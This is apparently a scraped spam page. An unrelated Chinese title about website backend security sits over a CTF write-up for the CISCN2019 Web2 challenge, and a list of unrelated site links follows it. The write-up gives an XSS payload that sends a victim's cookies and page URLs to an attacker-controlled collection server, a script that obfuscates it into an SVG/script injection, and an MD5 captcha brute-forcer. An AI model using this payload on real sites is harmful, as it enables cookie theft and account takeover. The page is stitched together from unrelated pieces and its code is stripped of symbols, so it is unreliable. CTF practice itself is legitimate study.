当前位置: 首页 > news >正文

什么后台做网站安全自助建站网站源码

什么后台做网站安全,自助建站网站源码,做视频怎样传到网站,wordpress搭建vip下载站[CISCN2019 华东北赛区]Web2 随便注册一个登录#xff0c;发现 还有反馈页面#xff0c;一看就知道大概率是xss#xff0c;应该是为了得到管理员cookie扫描了一下#xff0c;果然有admin.php后台登录 buu可以连接访问外网了#xff0c;所以内部的xss平台关闭了#xff0…[CISCN2019 华东北赛区]Web2 随便注册一个登录发现 还有反馈页面一看就知道大概率是xss应该是为了得到管理员cookie扫描了一下果然有admin.php后台登录 buu可以连接访问外网了所以内部的xss平台关闭了使用自己搭建的莲花平台不过需要一个服务器 自己搭建的xss平台使用 搭建 参考 https://blog.csdn.net/weixin_44652484/article/details/134169568 搭建非常简单 使用 根据其他人的题解 payload xss(function(){window.location.hrefhttp://ip/xss_platform/?locationescape((function(){try{return document.location.href}catch(e){return }})())toplocationescape((function(){try{return top.location.href}catch(e){return }})())cookieescape((function(){try{return document.cookie}catch(e){return }})())openerescape((function(){try{return (window.opener window.opener.location.href)?window.opener.location.href:}catch(e){return }})());})(); output for c in xss: output # str(ord(c)) print(svgscripteval#40#34 output #34#41/script)然后提交文章得到连接来到反馈页面 说了要将域名改成web 验证码 import hashlib numinput() for i in range(999999,10000000):mhashlib.md5()m.update(str(i).encode())mm.hexdigest()if m[:6]num:print(i)break然后我得不到管理员的cookie啊算了反正思路是这样的有没有大佬知道为什么的得到phpsessid之后登录然后就是一个简单的sql注入
http://www.pierceye.com/news/796416/

相关文章:

  • 住房与住房建设部网站首页给网站做收录较好的软件
  • 课程网站的设计网站开发遇到的难题
  • 学网站建设要什么iis 二级网站 发布
  • 怎么仿做网站wordpress文章进不去
  • 网站建设费算办公费吗html5商城网站模板
  • 188旅游网站源码下载做个爬架网站如何做
  • 中国做的比较好的网站设计公司有哪些可以做翻译兼职的网站吗
  • 深圳做网站建设公司dw学生个人网页制作视频
  • html网页设计代码作业网站衡水武邑县建设局网站
  • 网站后台登陆验证码wordpress 前台加载慢
  • 网站推广去哪家比较好专门做网站的公司叫什么
  • 前端做项目的网站资源公司做网站的步骤
  • 资源分享网站怎么建设网站建设百度云
  • 宣讲家网站官德修养与作风建设短视频seo关键词
  • 更新网站怎么弄建设工程合同范本工程施工合同范本
  • 外贸网站建设有什么需要注意的吗白山网站设计
  • 哪家做网站性价比高宁波seo网络优化哪家好
  • 望京做网站微信订阅号怎么做网站
  • 分销系统网站建设网站建设 51下拉平台
  • 怎么才能自己做网站怎么自己制作app
  • 爱看视频的网站政务公开既网站信息化建设会议
  • 做外单什么网站好网站模板下载之后怎么做
  • 网站维护细则微博同步wordpress
  • 网站微商城的建设新网域名备案
  • 网站举报有奖平台北京vi设计公司怎么样
  • Wix做的网站在国内打不开网站开发专业就业好不好
  • php语言做网站网站流量与带宽
  • 网站推广经验做网站职校选什么专业
  • 搜英文关键词网站凯里seo排名优化
  • 哪个网站可以帮忙做简历培训网网站源码